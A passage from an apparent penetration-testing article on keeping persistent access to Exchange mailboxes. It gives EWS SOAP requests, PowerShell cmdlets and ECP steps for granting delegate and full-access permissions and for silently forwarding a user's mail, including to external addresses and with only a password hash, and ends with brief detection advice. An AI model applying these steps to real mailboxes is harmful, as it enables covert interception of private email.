\u003C\u002Ft:delegatepermissions>\u003Cbr>        \u003Ct:receivecopiesofmeetingmessages>false\u003C\u002Ft:receivecopiesofmeetingmessages>\u003Cbr>        \u003Ct:viewprivateitems>true\u003C\u002Ft:viewprivateitems>\u003Cbr>      \u003C\u002Ft:delegateuser>\u003Cbr>    \u003C\u002Fm:delegateusers>\u003Cbr>      \u003Cm:delivermeetingrequests>DelegatesAndMe\u003C\u002Fm:delivermeetingrequests>\u003Cbr>    \u003C\u002Fm:updatedelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remove access permissions using RemoveDelegate\u003C\u002Fp>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fremovedelegate-operation\u003C\u002Fp>\u003Cp>Remove user test2's access permissions to user test1's inbox, format as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:removedelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:userids>\u003Cbr>        \u003Ct:userid>\u003Cbr>          \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>    \u003C\u002Fm:userids>\u003Cbr>    \u003C\u002Fm:removedelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2.UpdateFolder\u003C\u002Fh4>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fexchange-web-services\u002Fhow-to-set-folder-permissions-for-another-user-by-using-ews-in-exchange\u003C\u002Fp>\u003Cp>Check the access permissions for user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getfolder>\u003Cbr>      \u003Cm:foldershape>\u003Cbr>        \u003Ct:baseshape>IdOnly\u003C\u002Ft:baseshape>\u003Cbr>        \u003Ct:additionalproperties>\u003Cbr>          \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>        \u003C\u002Ft:fielduri>\u003C\u002Ft:additionalproperties>\u003Cbr>      \u003C\u002Fm:foldershape>\u003Cbr>      \u003Cm:folderids>\u003Cbr>        \u003Ct:distinguishedfolderid id=\"inbox\">\u003Cbr>      \u003C\u002Ft:distinguishedfolderid>\u003C\u002Fm:folderids>\u003Cbr>    \u003C\u002Fm:getfolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Grant user test2 full access permission to user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatefolder>\u003Cbr>      \u003Cm:folderchanges>\u003Cbr>        \u003Ct:folderchange>\u003Cbr>          \u003Ct:folderid id=\"{id}\" changekey=\"{key}\">\u003Cbr>          \u003Ct:updates>\u003Cbr>            \u003Ct:setfolderfield>\u003Cbr>              \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>              \u003Ct:folder>\u003Cbr>                \u003Ct:permissionset>\u003Cbr>                  \u003Ct:permissions>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:distinguisheduser>Default\u003C\u002Ft:distinguisheduser>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                      \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                      \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                      \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                      \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                      \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                      \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                      \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                      \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                    \u003Ct:userid>\u003Cbr>                      \u003Ct:distinguisheduser>Anonymous\u003C\u002Ft:distinguisheduser>\u003Cbr>                    \u003C\u002Ft:userid>\u003Cbr>                    \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                    \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                    \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                    \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                    \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                    \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                    \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                    \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                    \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:permissionlevel>Editor\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                  \u003C\u002Ft:permissions>\u003Cbr>                \u003C\u002Ft:permissionset>\u003Cbr>              \u003C\u002Ft:folder>\u003Cbr>            \u003C\u002Ft:fielduri>\u003C\u002Ft:setfolderfield>\u003Cbr>          \u003C\u002Ft:updates>\u003Cbr>        \u003C\u002Ft:folderid>\u003C\u002Ft:folderchange>\u003Cbr>      \u003C\u002Fm:folderchanges>\u003Cbr>    \u003C\u002Fm:updatefolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>It is important to note that the UpdateFolder operation will overwrite existing settings, so a delete operation is equivalent to restoring the permission configuration information.\u003C\u002Fp>\u003Cp>Remove user test2's access permissions to user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatefolder>\u003Cbr>      \u003Cm:folderchanges>\u003Cbr>        \u003Ct:folderchange>\u003Cbr>          \u003Ct:folderid id=\"{id}\" changekey=\"{key}\">\u003Cbr>          \u003Ct:updates>\u003Cbr>            \u003Ct:setfolderfield>\u003Cbr>              \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>              \u003Ct:folder>\u003Cbr>                \u003Ct:permissionset>\u003Cbr>                  \u003Ct:permissions>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:distinguisheduser>Default\u003C\u002Ft:distinguisheduser>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                      \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                      \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                      \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                      \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                      \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                      \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                      \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                      \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                    \u003Ct:userid>\u003Cbr>                      \u003Ct:distinguisheduser>Anonymous\u003C\u002Ft:distinguisheduser>\u003Cbr>                    \u003C\u002Ft:userid>\u003Cbr>                    \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                    \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                    \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                    \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                    \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                    \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                    \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                    \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                    \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                  \u003C\u002Ft:permissions>\u003Cbr>                \u003C\u002Ft:permissionset>\u003Cbr>              \u003C\u002Ft:folder>\u003Cbr>            \u003C\u002Ft:fielduri>\u003C\u002Ft:setfolderfield>\u003Cbr>          \u003C\u002Ft:updates>\u003Cbr>        \u003C\u002Ft:folderid>\u003C\u002Ft:folderchange>\u003Cbr>      \u003C\u002Fm:folderchanges>\u003Cbr>    \u003C\u002Fm:updatefolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The latter part of this article will introduce the complete implementation code.\u003C\u002Fp>\u003Ch3>3. Implementation via PowerShell\u003C\u002Fh3>\u003Cp>Commands for managing mailboxes need to be executed on the Exchange server.\u003C\u002Fp>\u003Cp>First, you need to add the dependency package:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The management snap-in names vary for different Exchange versions:\u003C\u002Fp>\u003Cul>\u003Cli>Exchange 2007: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;\u003C\u002Fli>\u003Cli>Exchange 2010: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;\u003C\u002Fli>\u003Cli>Exchange 2013 &amp; 2016: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fli>\u003C\u002Ful>\u003Cp>View the access permissions for user test2's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-MailboxFolderPermission -Identity test2@test.com:\\Inbox|fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Add read permission for user test2 to user test1's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-MailboxFolderPermission -Identity test1@test.com:\\Inbox -User test2@test.com -AccessRights Owner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remove user test2's read permission for user test1's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-MailboxFolderPermission -Identity test1@test.com:\\Inbox -User test2@test.com -Confirm:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Method to Continuously Obtain Exchange User Inbox Emails by Adding Mail Functionality\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Add forwarding functionality via EAC\u003C\u002Fh3>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Frecipients\u002Fuser-mailboxes\u002Femail-forwarding?view=exchserver-2016\u003C\u002Fp>\u003Cp>Requires access to Exchange Admin Center (EAC), i.e., Exchange administrator permissions and access to Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in to ECP using Exchange administrator credentials\u003C\u002Fp>\u003Cp>Locate user test1 and edit, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017393631_4_dd4a22b5c5-1.jpeg\">\u003C\u002Fp>\u003Cp>Select Mailbox Features -&gt; Mail Flow -&gt; select View details\u003C\u002Fp>\u003Cp>Select Enable forwarding, add user, choose Deliver message to both forwarding address and mailbox, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017431017_5_9a43d63738-1.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the forwarding function setup is complete\u003C\u002Fp>\u003Cp>Whenever user test1 receives an email, the message will also be sent to user test2's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes the email from the inbox, test2 is not affected\u003C\u002Fp>\u003Ch3>2. Implement via Exchange Management Shell\u003C\u002Fh3>\u003Cp>Exchange Management Shell can be launched in the following three ways:\u003C\u002Fp>\u003Cp>(1) Run Exchange Management Shell directly on the Exchange Server\u003C\u002Fp>\u003Cp>(2) Start PowerShell on the Exchange Server and enter the command Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fp>\u003Cp>(3) Connect to the Exchange server using PSSession\u003C\u002Fp>\u003Cp>For detailed methods, refer to the previous article 'Penetration Basics – Searching and Exporting Emails from Exchange Servers'\u003C\u002Fp>\u003Cp>The PowerShell command to add forwarding of emails from user test1's inbox to user test2 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Set-Mailbox -Identity \"test1\" -ForwardingAddress \"test2\" -DeliverToMailboxAndForward $true\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If forwarding emails to an unverified external email address, replace ForwardingAddress with ForwardingSmtpAddress\u003C\u002Fp>\u003Ch2>0x05 Method to Add User Permissions for Persistent Access to Exchange User Emails\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fpowershell\u002Fmodule\u002Fexchange\u002Fadd-mailboxpermission?view=exchange-ps\u003C\u002Fp>\u003Cp>The PowerShell command to add full access permissions for user test1 to user test2's mailbox is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-MailboxPermission -Identity \"test2\" -User \"test1\" -AccessRights FullAccess -InheritanceType All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to view the mailbox access permissions for user test2 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-MailboxPermission -Identity test2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to remove user test1's full access permissions to user test2's mailbox is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-MailboxPermission -Identity \"test2\" -User \"test1\" -AccessRights FullAccess -Confirm:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add-RecipientPermission can only be used in cloud-based services. Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fpowershell\u002Fmodule\u002Fexchange\u002Fadd-recipientpermission?view=exchange-ps\u003C\u002Fp>\u003Ch2>0x06 Open Source Code\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In practical use, if only the hash of a mail user is available, it is not possible to add mail forwarding rules via OWA and ECP.\u003C\u002Fp>\u003Cp>However, we can first log in to EWS using the hash, then send SOAP messages through a program to achieve this.\u003C\u002Fp>\u003Cp>Here, using the previously open-source program ewsManage.py as a template, the following features have been added:\u003C\u002Fp>\u003Cul>\u003Cli>getdelegateofinbox\u003C\u002Fli>\u003Cli>adddelegateofinbox\u003C\u002Fli>\u003Cli>updatedelegateofinbox\u003C\u002Fli>\u003Cli>removedelegateofinbox\u003C\u002Fli>\u003Cli>getdelegateofsentitems\u003C\u002Fli>\u003Cli>updatedelegateofsentitems\u003C\u002Fli>\u003Cli>restoredelegateofsentitems\u003C\u002Fli>\u003Cli>getinboxrules\u003C\u002Fli>\u003Cli>updateinboxrules\u003C\u002Fli>\u003Cli>removeinboxrules\u003C\u002Fli>\u003C\u002Ful>\u003Cp>GitHub code has been updated, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x07 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. View forwarding rules for a single mail user\u003C\u002Fp>\u003Cp>Access Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in, view organize email -&gt; inbox rules\u003C\u002Fp>\u003Cp>2. View access permissions for a single mail user\u003C\u002Fp>\u003Cp>Access Outlook Web Access (OWA)\u003C\u002Fp>\u003Cp>Log in, view Inbox-&gt;permissions...\u003C\u002Fp>\u003Cp>3. Check the inbox forwarding function for all mail users\u003C\u002Fp>\u003Cp>Run Exchange Management Shell, view the command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Mailbox|Select-Object UserPrincipalName,ForwardingAddress,ForwardingSmtpAddress\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces four methods to continuously obtain Exchange user inbox emails, provides open-source implementation code via SOAP XML messages, supports usage under hash-only conditions, and offers defense recommendations combined with exploitation approaches.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1164,"Onedaysec",8,"published","2026-02-02T07:51:00.263Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Exchange Email Persistence: Forwarding Rules & Access Permissions","Exchange security, email persistence, forwarding rules, access permissions, penetration testing, email defense",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4,47],440,439,438,436,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.342Z","2026-07-23T16:01:34.982Z","draft","2026-07-23T16:06:16.128Z"]